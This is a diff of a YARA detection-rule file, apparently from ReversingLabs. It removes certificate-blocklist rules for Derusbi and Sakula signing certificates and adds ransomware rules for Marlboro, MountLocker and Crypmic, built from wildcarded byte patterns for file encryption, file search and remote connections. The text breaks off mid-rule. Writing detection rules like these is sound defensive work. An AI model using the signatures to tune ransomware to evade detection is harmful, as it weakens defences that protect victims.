"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Marlboro.yara#L1-L117" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d36c3cf52af47e9f638f58aabc19298e8c58831c3083f82e4c194319503eeaaa" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Marlboro" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Saly Younes" and pe.signatures[i].serial=="09:81:3e:e7:31:84:52:c2:8a:1f:64:26:d1:ce:e1:2d" and 1455667199<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_476Bf24A4B1E9F4Bc2A61B152115E1Fe : INFO FILE -{ - meta: - description = "Certificate used for digitally signing Derusbi malware." - author = "ReversingLabs" - id = "a41e8196-f5ad-5046-82ac-38c6fe753bdb" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2014-L2030" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0ec0f44d2a7a53ad5653334378b631abde1834ebfcf72efcdcce353c6b9ae17d" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $ping_apnic = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 0F 57 + C0 F3 0F 7F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D + 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? + 8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF + B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $remote_server_connection_1 = { + BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D7 8B C8 E8 ?? ?? ?? ?? BA ?? ?? + ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B + C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 8D 4D ?? + 50 E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 + } + $remote_server_connection_2 = { + 84 C0 74 ?? B3 ?? EB ?? 32 DB C7 45 ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 83 7D + ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3D ?? ?? ?? + ?? 74 ?? 8D 80 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? [0-3] 8B 85 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 C6 + 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? 8B F0 85 C9 74 ?? 8B + 01 FF 50 ?? 85 C0 74 ?? 8B 10 8B C8 6A ?? FF 12 8B 06 8B CE 6A ?? 8B 40 ?? FF D0 + } + $remote_server_connection_3 = { + 50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 83 C4 ?? 8B 7D ?? 8B 08 8B 49 + ?? F6 44 01 ?? ?? 75 ?? 8B 75 ?? 8D 4D ?? 83 FB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F + 43 CF 3B F0 0F 42 C6 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 83 FE ?? 73 ?? 83 C8 ?? + EB ?? 33 C0 83 FE ?? 0F 95 C0 85 C0 0F 94 C0 84 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B + B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 83 FB ?? 72 + } + $remote_server_connection_4 = { + 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D + ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B + C6 EB ?? 8B 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 8B 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B8 ?? + ?? ?? ?? C3 8B 85 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 + CD E8 ?? ?? ?? ?? 8B E5 5D + } + $encrypt_file = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 51 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? + 8B 35 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 51 0F 43 45 ?? 8D 8D ?? ?? ?? + ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BF ?? ?? ?? ?? + 8B 40 ?? 75 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 0B C7 EB ?? 03 C8 33 C0 39 + 41 ?? 0F 44 C7 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 8D 8D ?? + ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? + 75 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? EB ?? 03 C8 33 C0 39 41 ?? + 0F 44 C7 6A ?? 50 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 83 EC + ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 6A ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8D 8D ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 75 ?? 8D 64 24 ?? 51 8D 55 ?? + 8B CE E8 ?? ?? ?? ?? 51 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 + ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 74 ?? 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 + C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8 + 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D + 45 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? + C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? + ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 85 ?? + ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 + ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? + C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? + ?? ?? 8D 45 ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF + 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? C7 45 ?? ?? ?? + ?? ?? 66 89 45 ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? + ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Wemade Entertainment co.,Ltd" and pe.signatures[i].serial=="47:6b:f2:4a:4b:1e:9f:4b:c2:a6:1b:15:21:15:e1:fe" and 1414454399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $ping_apnic and $remote_server_connection_1 and $remote_server_connection_2 and $remote_server_connection_3 and $remote_server_connection_4 and $encrypt_file } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_7Bd55818C5971B63Dc45Cf57Cbeb950B : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Mountlocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing Derusbi malware." + description = "Yara rule that detects MountLocker ransomware." author = "ReversingLabs" - id = "9269cc5c-039e-5d98-ac13-c7b99606e7fa" - date = "2023-11-08" - modified = "2023-11-08" + id = "8ce7e5c4-9eca-5dd2-ab92-39b915900d72" + date = "2021-03-25" + modified = "2021-03-25" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2032-L2048" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5aa41a2d6a86a30559b36818602e1bdf2bfd38b799a4869c26c150052d6d788c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.MountLocker.yara#L1-L86" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d203217c229d54802e96e19dc66d38ecb0443d19e0492efe337df471a99559dc" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "MountLocker" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "XL Games Co.,Ltd." and pe.signatures[i].serial=="7b:d5:58:18:c5:97:1b:63:dc:45:cf:57:cb:eb:95:0b" and 1371513599<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4C0B2E9D2Ef909D15270D4Dd7Fa5A4A5 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing Derusbi malware." - author = "ReversingLabs" - id = "97005464-1219-56d7-bd5c-f047558be1dc" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2050-L2066" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9c74eb025bb413503b97ffdba6f19eadecf3789ce3a5d5419f84e32e25c9b5b1" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $encrypt_files_p1 = { + 55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 8B 3D ?? ?? ?? ?? 8B DA 8B F1 FF D7 89 44 24 ?? + 33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 56 89 54 24 ?? 89 44 24 ?? FF 15 + ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51 50 FF 15 ?? ?? ?? + ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF 74 24 ?? 6A ?? 6A ?? FF 74 24 ?? FF + 15 ?? ?? ?? ?? 89 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C9 0F 31 89 44 8C ?? 41 83 F9 + ?? 72 ?? FF 75 ?? 8B D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 59 85 C0 74 ?? 8D 4C + 24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 8B 7C 24 ?? 8B 44 24 ?? 89 7C 24 ?? 89 44 24 ?? 8B + 35 ?? ?? ?? ?? 8B DE 8B 15 ?? ?? ?? ?? 03 DF 8B CA 89 54 24 ?? 13 C8 BF ?? ?? ?? ?? + 8B C6 F0 0F C7 0F 8B 7C 24 ?? 3B C6 8B 44 24 ?? 75 ?? 3B 54 24 ?? 75 ?? FF 74 24 ?? + 8B 35 ?? ?? ?? ?? FF D6 FF 74 24 ?? FF D6 8B 3D ?? ?? ?? ?? FF D7 8B F8 8B C2 2B 7C + 24 ?? 89 7C 24 ?? 1B 44 24 ?? 89 44 24 ?? 75 ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? + ?? ?? 8B DE 8B 15 ?? ?? ?? ?? 03 DF 8B CA 89 54 24 ?? 13 C8 BF ?? ?? ?? ?? 8B C6 F0 + 0F C7 0F 8B 7C 24 ?? 3B C6 8B 44 24 ?? 75 ?? 3B 54 24 ?? 75 ?? 50 57 FF 74 24 ?? FF + 74 24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 8B C2 81 E2 ?? ?? ?? ?? 25 ?? ?? ?? ?? 89 54 24 + ?? DF 6C 24 ?? 83 64 24 ?? ?? 89 44 24 ?? DF 6C 24 ?? D9 E0 DE C1 D9 5C 24 ?? D9 44 + 24 ?? D9 05 ?? ?? ?? ?? D8 D9 DF E0 F6 C4 ?? 7A ?? D9 1D ?? ?? ?? ?? EB ?? DD D8 8B + 44 24 ?? EB ?? 8B 44 24 ?? 85 C0 8B 35 ?? ?? ?? ?? 74 ?? 50 FF D6 FF 74 24 ?? FF D6 + 33 C0 5F 5E 5B 8B E5 5D C3 + } + $encrypt_files_p2 = { + 55 8B EC 83 EC ?? 53 56 57 33 FF 6A ?? 8B F7 5B 0F 31 6A ?? 89 86 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? 83 C6 ?? 3B F3 72 ?? 8B D3 B9 ?? ?? ?? ?? 8A 01 88 41 ?? 41 83 EA ?? 75 + ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 57 8D 45 ?? 89 5D ?? 50 89 7D ?? 89 7D ?? FF + 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 57 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? + ?? ?? 57 6A ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? 8B F0 FF 15 ?? ?? ?? ?? 57 FF + 75 ?? FF 15 ?? ?? ?? ?? 85 F6 74 ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 33 C0 40 + EB ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E + 5B 8B E5 5D C3 + } + $find_files_p1 = { + 53 55 56 8B 74 24 ?? 8B EA 57 8B F9 6A ?? 83 26 ?? 58 66 89 44 6F ?? 8D 5F ?? 33 C0 + 66 89 44 6F ?? 8D 87 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 53 89 44 24 ?? FF D0 33 C9 66 89 + 4C 6F ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 39 4F ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 + F8 ?? 0F 85 ?? ?? ?? ?? 8D 46 ?? 50 6A ?? 8D 4E ?? 51 8D 56 ?? 52 8D 46 ?? 50 6A ?? + 6A ?? 8D 5F ?? 53 FF 15 ?? ?? ?? ?? F7 D8 1B C0 83 C0 ?? 89 06 74 ?? 8B CB E8 ?? ?? + ?? ?? 85 C0 74 ?? 6A ?? 58 66 89 44 6F ?? 33 C0 66 89 44 6F ?? 8D 87 ?? ?? ?? ?? 50 + 53 FF 54 24 ?? 33 C9 66 89 4C 6F ?? 83 F8 ?? 75 ?? 39 0E 74 ?? 51 FF 76 ?? FF 76 ?? + FF 76 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 3E ?? 74 ?? FF 76 ?? FF 15 ?? ?? ?? ?? + 83 26 ?? 83 C8 ?? 5F 5E 5D 5B C3 + } + $find_files_p2 = { + 55 8B EC 83 E4 ?? 83 EC ?? 53 55 56 8B F1 57 FF 46 ?? 8D 7E ?? 8B 07 8D 5E ?? 89 44 + 24 ?? 8B 46 ?? 53 89 07 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 51 8B D0 8B CE E8 + ?? ?? ?? ?? 8B E8 59 83 FD ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 8D 86 ?? ?? ?? ?? 50 FF + 15 ?? ?? ?? ?? 8D 9E ?? ?? ?? ?? F6 03 ?? 74 ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB + ?? 8D 86 ?? ?? ?? ?? 50 8B 44 24 ?? 05 ?? ?? ?? ?? 8D 04 46 50 FF 15 ?? ?? ?? ?? FF + 76 ?? 57 6A ?? FF 16 83 C4 ?? 85 C0 74 ?? 53 55 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 55 FF + 15 ?? ?? ?? ?? 83 7E ?? ?? 8D 5E ?? 74 ?? 83 7C 24 ?? ?? 74 ?? 6A ?? FF 74 24 ?? FF + 74 24 ?? FF 74 24 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 7C 24 ?? ?? 74 ?? FF 74 24 + ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 C0 89 0F 40 5F 5E 5D 5B 8B E5 5D C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Fuqing Dawu Technology Co.,Ltd." and pe.signatures[i].serial=="4c:0b:2e:9d:2e:f9:09:d1:52:70:d4:dd:7f:a5:a4:a5" and 1372118399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_5E3D76Dc7E273E2F313Fc0775847A2A2 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Crypmic : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing Sakula and Derusbi malware." + description = "Yara rule that detects Crypmic ransomware." author = "ReversingLabs" - id = "93707307-a250-526d-a3d4-32ed5d2a63a6" - date = "2023-11-08" - modified = "2023-11-08" + id = "0d5c2141-c0ca-53c8-91fd-ec2d5f163df2" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2068-L2084" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b943057fc3e97cfccadb4b8f61289a93b659aacf2a40217fcf519d4882e70708" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Crypmic.yara#L1-L56" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ee97c4d35cee68e080a4e9e0a21ecd3698da638463881a58f5daaf906ef86f75" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Crypmic" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "NexG" and pe.signatures[i].serial=="5e:3d:76:dc:7e:27:3e:2f:31:3f:c0:77:58:47:a2:a2" and 1372723199<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_47D5D5372Bcb1562B4C9F4C2Bdf13587 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing Sakula malware." - author = "ReversingLabs" - id = "d888478e-3883-5d9d-a2b3-d59b57409b8d" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2086-L2102" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fb4994647a2ed95c73625d90315c9b6deb6fb3b81b4aa6e847b0193f0a76650c" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $search_and_encrypt_1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 B8 ?? ?? ?? ?? 57 8B F9 89 7D ?? C7 45 ?? ?? ?? ?? + ?? 89 45 ?? 8D 50 ?? 68 ?? ?? ?? ?? 6A ?? FF 77 ?? 66 89 85 ?? ?? ?? ?? 8B 47 ?? C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D0 66 8B 95 ?? ?? ?? ?? 33 F6 33 + C9 89 45 ?? 66 3B F2 74 ?? 0F B7 D2 41 66 89 14 06 8D 34 09 33 DB 0F B7 94 35 ?? ?? + ?? ?? 66 3B DA 75 ?? BA ?? ?? ?? ?? 66 89 14 48 8D 1C 48 8D 8D ?? ?? ?? ?? 51 C7 43 + ?? ?? ?? ?? ?? 50 8B 47 ?? FF D0 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? + ?? 74 ?? 66 8B 8D ?? ?? ?? ?? 66 83 F9 ?? 74 ?? 66 83 BD ?? ?? ?? ?? ?? 74 ?? 33 D2 + 33 C0 66 3B D1 74 ?? 0F B7 C9 8B FF 40 66 89 4C 1A ?? 8D 14 00 C7 45 ?? ?? ?? ?? ?? + 0F B7 8C 15 ?? ?? ?? ?? 66 39 4D ?? 75 ?? 8B 55 ?? 33 C9 66 89 4C 43 ?? 68 ?? ?? ?? + ?? 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 01 45 ?? 8D 85 ?? ?? ?? ?? 50 8B 47 ?? 56 FF D0 85 + C0 75 ?? 8B 47 ?? 56 FF D0 8D 85 ?? ?? ?? ?? 50 FF 75 ?? C7 43 ?? ?? ?? ?? ?? 8B 47 + } + $search_and_encrypt_2 = { + 33 F6 89 75 ?? FF D0 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? 8D 9B ?? ?? ?? ?? + F6 85 ?? ?? ?? ?? ?? 75 ?? 66 8B BD ?? ?? ?? ?? 33 F6 8B 8E ?? ?? ?? ?? 8D 95 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 83 FF ?? 75 ?? + EB ?? 8D 9B ?? ?? ?? ?? 66 8B 48 ?? 83 C0 ?? 83 C2 ?? 66 3B 0A 74 ?? 66 83 38 ?? 0F + 85 ?? ?? ?? ?? 66 83 3A ?? 0F 85 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 72 ?? 8B 7D + ?? 8B 75 